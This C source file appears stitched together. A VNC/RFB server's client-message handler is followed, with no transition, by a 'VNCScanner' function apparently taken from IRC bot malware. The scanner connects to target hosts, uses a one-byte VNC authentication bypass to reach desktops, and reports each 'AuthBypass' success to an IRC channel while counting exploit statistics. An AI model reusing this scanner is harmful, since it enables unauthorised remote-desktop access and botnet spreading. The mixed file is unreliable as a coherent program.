case rfbEncodingCoRRE:
debug_printf("client %s supported rfbEncodingCoRRE\n",cl->host);
if (cl->preferredEncoding == -1) {
cl->preferredEncoding = enc;
debug_printf("Using CoRRE encoding for client %s\n",
cl->host);
}
break;
case rfbEncodingHextile:
debug_printf("client %s supported rfbEncodingHextile\n",cl->host);
if (cl->preferredEncoding == -1) {
cl->preferredEncoding = enc;
debug_printf("Using hextile encoding for client %s\n",
cl->host);
}
break;
case rfbEncodingZlib:
debug_printf("client %s supported rfbEncodingZlib\n",cl->host);
if (cl->preferredEncoding == -1) {
cl->preferredEncoding = enc;
debug_printf("Using zlib encoding for client %s\n",
cl->host);
}
break;
case rfbEncodingTight:
debug_printf("client %s supported rfbEncodingHextile\n",cl->host);
if (cl->preferredEncoding == -1) {
cl->preferredEncoding = enc;
debug_printf("Using tight encoding for client %s\n",
cl->host);
}
break;
case rfbEncodingXCursor:
debug_printf("Enabling X-style cursor updates for client %s\n",
cl->host);
cl->enableCursorShapeUpdates = TRUE;
cl->useRichCursorEncoding = FALSE;
cl->cursorWasChanged = TRUE;
break;
case rfbEncodingRichCursor:
if (!cl->enableCursorShapeUpdates) {
debug_printf("Enabling full-color cursor updates for client "
"%s\n", cl->host);
cl->enableCursorShapeUpdates = TRUE;
cl->useRichCursorEncoding = TRUE;
cl->cursorWasChanged = TRUE;
}
break;
case rfbEncodingLastRect:
debug_printf("client %s supported rfbEncodingLastRect\n",cl->host);
if (!cl->enableLastRectEncoding) {
debug_printf("Enabling LastRect protocol extension for client "
"%s\n", cl->host);
cl->enableLastRectEncoding = TRUE;
}
break;
default:
if ( enc >= (u32)rfbEncodingCompressLevel0 &&
enc <= (u32)rfbEncodingCompressLevel9 ) {
cl->zlibCompressLevel = enc & 0x0F;
cl->tightCompressLevel = enc & 0x0F;
debug_printf("Using compression level %d for client %s\n",
cl->tightCompressLevel, cl->host);
} else if ( enc >= (u32)rfbEncodingQualityLevel0 &&
enc <= (u32)rfbEncodingQualityLevel9 ) {
cl->tightQualityLevel = enc & 0x0F;
debug_printf("Using image quality level %d for client %s\n",
cl->tightQualityLevel, cl->host);
} else
debug_printf("rfbProcessClientNormalMessage: ignoring unknown "
"encoding type %d\n", (int)enc);
}
}
if (cl->preferredEncoding == -1) {
cl->preferredEncoding = rfbEncodingRaw;
}
return;
}
case rfbFramebufferUpdateRequest:
{
//debug_printf("rfbSetEncodings!\n");
if ((n = ReadExact(cl, ((char *)&msg) + 1,
sz_rfbFramebufferUpdateRequestMsg-1)) <= 0) {
if (n != 0)
debug_printf("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
if(msg.fur.incremental==FALSE)//客户端请求整幅数据,出现了某些数据的丢失
{
cl->InitDone=FALSE;
cl->modifiedregion.x=Swap16IfLE(msg.fur.x);
cl->modifiedregion.y=Swap16IfLE(msg.fur.y);
cl->modifiedregion.w=Swap16IfLE(msg.fur.w);
cl->modifiedregion.h=Swap16IfLE(msg.fur.h);
}
else
{
cl->InitDone=TRUE;
}
if (!cl->readyForSetColourMapEntries) {
/* client hasn't sent a SetPixelFormat so is using server's */
cl->readyForSetColourMapEntries = TRUE;
if (!cl->format.trueColour) {
if (!rfbSendSetColourMapEntries(cl, 0, 256)) {
// sraRgnDestroy(tmpRegion);
// TSIGNAL(cl->updateCond);
// UNLOCK(cl->updateMutex);
debug_printf("failed to send the color map!");
return;
}
}
}
cl->HasRequest = 1;
return;
}
case rfbKeyEvent:
debug_printf("rfbKeyEvent!\n");
cl->rfbKeyEventsRcvd++;
if ((n = ReadExact(cl, ((char *)&msg) + 1,
sz_rfbKeyEventMsg - 1)) <= 0) {
if (n != 0)
debug_printf("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
//打印接受到的键盘值
msg.ke.key=Swap32IfLE(msg.ke.key);
#if CN_CFG_KEYBOARD == 1
vncclient_keyevent(cl->screen, msg);
#endif
return;
case rfbPointerEvent:
cl->rfbPointerEventsRcvd++;
if ((n = ReadExact(cl, ((char *)&msg) + 1,
sz_rfbPointerEventMsg - 1)) <= 0)
{
if (n != 0)//等于0应该是客户端主动关闭了
debug_printf("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
//输入touch message
msg.pe.x = Swap16IfLE(msg.pe.x);
msg.pe.y = Swap16IfLE(msg.pe.y);
// debug_printf("rfbPointerEvent!----x=%d y=%d\n", msg.pe.x,msg.pe.y);
#if CN_CFG_KEYBOARD == 1
vncclient_pointevent(cl->screen, msg);
#endif
return;
case rfbClientCutText:
debug_printf("rfbClientCutText!\n");
if ((n = ReadExact(cl, ((char *)&msg) + 1,
sz_rfbClientCutTextMsg - 1)) <= 0) {
if (n != 0)
debug_printf("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.cct.length = Swap32IfLE(msg.cct.length);
str = (char *)M_MallocLc(msg.cct.length+1, 0);
if ((n = ReadExact(cl, str, msg.cct.length)) <= 0) {
if (n != 0)
debug_printf("rfbProcessClientNormalMessage: read");
free(str);
rfbCloseClient(cl);
return;
}
// cl->screen->setXCutText(str, msg.cct.length, cl);
str[msg.cct.length]= 0;
debug_printf(" the cut messaged=%s\n",str);
free(str);
return;
default:
debug_printf("rfbProcessClientNormalMessage: unknown message type %d\n",
msg.type);
debug_printf(" ... closing connection\n");
rfbCloseClient(cl);
return;
}
}
BOOL VNCScanner(EXINFO exinfo) {
char buffer[IRCLINE];
char szClientPacket[] = "\x01";
struct sockaddr_in thataddr;
int res;
SOCKET m_sock;
m_sock = fsocket(PF_INET, SOCK_STREAM, 0);
if (m_sock == INVALID_SOCKET) {
fclosesocket(m_sock);
return FALSE;
}
thataddr.sin_addr.s_addr = finet_addr(exinfo.ip);
thataddr.sin_family = AF_INET;
thataddr.sin_port = fhtons((unsigned short)exinfo.port);
res = fconnect(m_sock, (LPSOCKADDR) &thataddr, sizeof(thataddr));
if (res == SOCKET_ERROR) {
fclosesocket(m_sock);
return FALSE;
}
//connected
//now lets negotiate protocol
rfbProtocolVersionMsg pv;
if (!ReadExact(m_sock, pv, sz_rfbProtocolVersionMsg)) {
closesocket(m_sock);
return FALSE;
}
pv[sz_rfbProtocolVersionMsg] = 0;
int m_majorVersion, m_minorVersion;
if (sscanf(pv,rfbProtocolVersionFormat,&m_majorVersion,&m_minorVersion) != 2) {
closesocket(m_sock);
return FALSE;
}
if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) {
//Server is not 3.8
closesocket(m_sock);
return FALSE;
}
if (!WriteExact(m_sock, pv, sz_rfbProtocolVersionMsg)) {
closesocket(m_sock);
return FALSE;
}
//auth part
CARD32 authScheme, authResult;
// CARD8 challenge[CHALLENGESIZE];
//we expect to get 2 bytes
if (!ReadExact(m_sock, (char *)&authScheme, 2)) {
closesocket(m_sock);
return FALSE;
}
//return clientpacket
if (!WriteExact(m_sock, szClientPacket, 1)) {
closesocket(m_sock);
return FALSE;
}
if (ReadExact(m_sock, (char *) &authResult, 4)) {
authResult = Swap32IfLE(authResult);
switch (authResult) {
case rfbVncAuthOK:
{
rfbServerInitMsg m_si;
//send non-shared session request and receive data
if (WriteExact(m_sock, (char *) useShared, sz_rfbClientInitMsg) &&
ReadExact(m_sock, (char *) &m_si, sz_rfbServerInitMsg)) {
//lets get desktop name
m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth);
m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight);
m_si.format.redMax = Swap16IfLE(m_si.format.redMax);
m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax);
m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax);
m_si.nameLength = Swap32IfLE(m_si.nameLength);
TCHAR *m_desktopName;
m_desktopName = new TCHAR[m_si.nameLength + 2];
ReadString(m_sock, m_desktopName, m_si.nameLength);
_snprintf(buffer, sizeof(buffer), "VNC%d.%d %s: %s - [AuthBypass]",
m_majorVersion, m_minorVersion, m_desktopName, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
closesocket(m_sock);
return TRUE;
}
break;
}
default:
{
break;
}
}
}
closesocket(m_sock);
return FALSE;
}
